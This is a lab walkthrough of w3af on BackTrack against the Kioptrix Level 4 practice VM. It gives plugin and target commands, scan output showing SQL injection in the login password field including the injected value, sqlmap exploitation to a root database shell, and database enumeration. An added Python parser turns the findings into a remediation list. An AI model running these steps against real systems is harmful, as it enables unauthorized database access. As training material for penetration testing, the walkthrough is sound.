A Simple w3af Usage Tutorial
Time: 2023-09-11 14:20:34
0x00 Overview
Using w3af on BackTrack 5 R3 to test the SQL injection vulnerability in Kioptrix Level 4.
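0x01 Introduction
w3af is a web application attack and audit framework. The project has more than 130 plugins, including plugins for web crawling and for checking SQL injection, cross-site scripting (XSS), local file inclusion (LFI), remote file inclusion (RFI), and more. The project's goal is to build a framework for finding and exploiting web application security vulnerabilities that is easy to use and extend.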
0x02 Installation
root@bt:~# apt-get install w3af
0x03 Startup
root@bt:~# cd /pentest/web/w3af/
root@bt:/pentest/web/w3af# ./w3af_console
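0x04 Vulnerability Scan Configuration
w3af>>> plugins  // enter the plugins menu
w3af/plugins>>> list discovery  // list all discovery plugins
w3af/plugins>>> discovery findBackdoor phpinfo webSpider  // enable the three plugins findBackdoor, phpinfo and webSpider
w3af/plugins>>> list audit  // list all vulnerability (audit) plugins
w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss  // enable the five plugins blindSqli, fileUpload, osCommanding, sqli and xss
w3af/plugins>>> back  // return to the main menu
w3af>>> target  // enter the target configuration menu
w3af/config:target>>> set target http://192.168.244.132/  // set the target to http://192.168.244.132/
w3af/config:target>>> back  // return to the main menu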
0x05 Vulnerability Scan
w3af>>> start
---
New URL found by phpinfo plugin: http://192.168.244.132/
New URL found by phpinfo plugin: http://192.168.244.132/checklogin.php
New URL found by phpinfo plugin: http://192.168.244.132/index.php
New URL found by webSpider plugin: http://192.168.244.132/
New URL found by webSpider plugin: http://192.168.244.132/checklogin.php
New URL found by webSpider plugin: http://192.168.244.132/index.php
Found 3 URLs and 8 different points of injection.
The list of URLs is:
- http://192.168.244.132/index.php
- http://192.168.244.132/checklogin.php
- http://192.168.244.132/
The list of fuzzable requests is:
- http://192.168.244.132/ | Method: GET
- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")
- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")
- http://192.168.244.132/checklogin.php | Method: GET
- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")
- http://192.168.244.132/index.php | Method: GET
- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")
- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")
Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.
SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John Submit=Login mypassword=dz"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.
Scan finished in 19 seconds.
---
// start the scan
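For triage, the scan report above can be reduced to one worklist entry per injectable parameter, with the SQL error fragments attached to the finding that shares their request id. The following Python is an added example, not part of the original tutorial or of w3af; `parse_findings`, the regular expressions and `SAMPLE_REPORT` (an excerpt copied from the report above) are this example's own names and assume the report wording shown on this page.

```python
import re

# Excerpt of the w3af report above, flattened (no line breaks) as it appears on the page.
SAMPLE_REPORT = (
    'Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", '
    'using HTTP method POST. The injectable parameter is: "mypassword". '
    'This vulnerability was found in the requests with ids 309 to 310.'
    'A SQL error was found in the response supplied by the web application, the '
    'error is (only a fragment is shown): "supplied argument is not a valid MySQL". '
    'The error was found on response with id 989.'
    'A SQL error was found in the response supplied by the web application, the '
    'error is (only a fragment is shown): "mysql_". The error was found on response with id 989.'
    'SQL injection in a MySQL database was found at: '
    '"http://192.168.244.132/checklogin.php", using HTTP method POST. '
    'The sent post-data was: "myusername=John Submit=Login mypassword=dz"0". '
    'The modified parameter was "mypassword". '
    'This vulnerability was found in the request with id 989.'
)

FINDING_RE = re.compile(
    r'(?P<kind>Blind SQL injection|SQL injection in a \w+ database)'
    r' was found at: "(?P<url>[^"]+)", using HTTP method (?P<method>[A-Z]+)\.'
    r'.*?(?:injectable parameter is: |modified parameter was )"(?P<param>[^"]+)"\.'
    r'\s*This vulnerability was found in the requests? with ids? '
    r'(?P<first>\d+)(?: to (?P<last>\d+))?', re.S)
ERROR_RE = re.compile(
    r'A SQL error was found in the response.*?\(only a fragment is shown\): '
    r'"(?P<frag>[^"]+)"\.\s*The error was found on response with id (?P<rid>\d+)', re.S)

def parse_findings(report):
    """Group w3af SQLi findings into one entry per (url, method, parameter)."""
    errors = {}  # response id -> SQL error fragments reported for it
    for m in ERROR_RE.finditer(report):
        errors.setdefault(int(m["rid"]), []).append(m["frag"])
    grouped = {}
    for m in FINDING_RE.finditer(report):
        key = (m["url"], m["method"], m["param"])
        entry = grouped.setdefault(key, dict(
            url=key[0], method=key[1], parameter=key[2],
            kinds=[], request_ids=[], evidence=[]))
        entry["kinds"].append("blind_sqli" if m["kind"].startswith("Blind") else "sqli")
        ids = range(int(m["first"]), int(m["last"] or m["first"]) + 1)
        entry["request_ids"].extend(ids)
        # Attach error fragments the report lists under the same id (989 in the sample).
        entry["evidence"].extend(f for rid in ids for f in errors.get(rid, []))
    return list(grouped.values())

if __name__ == "__main__":
    print(parse_findings(SAMPLE_REPORT))
```

Both plugin findings collapse into a single entry for the `mypassword` POST parameter of `checklogin.php`, which is the one place the application needs a parameterized query.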
w3af>>> exploit  // enter the exploit menu
w3af/exploit>>> list exploit  // list all exploit plugins
w3af/exploit>>> exploit sqlmap  // use sqlmap to test the SQL injection vulnerability
---
Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] sqlobject ( dbms: "MySQL = 5.0.0" | ruser: "root@localhost" )
Please use the interact command to interact with the shell objects.
---
// the test confirms that a SQL injection vulnerability exists
// note the shell object number here (0 in this case); it is needed in the next step
0x07 Exploitation
w3af/exploit>>> interact 0  // interact + the shell object number starts using it
---
Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shell
w3af/exploit/sqlmap-0>>>
---
// an interactive sqlmap module
w3af/exploit/sqlmap-0>>> dbs
---
Available databases: [3]:
[*] information_schema
[*] members
[*] mysql
---
// database information obtained successfully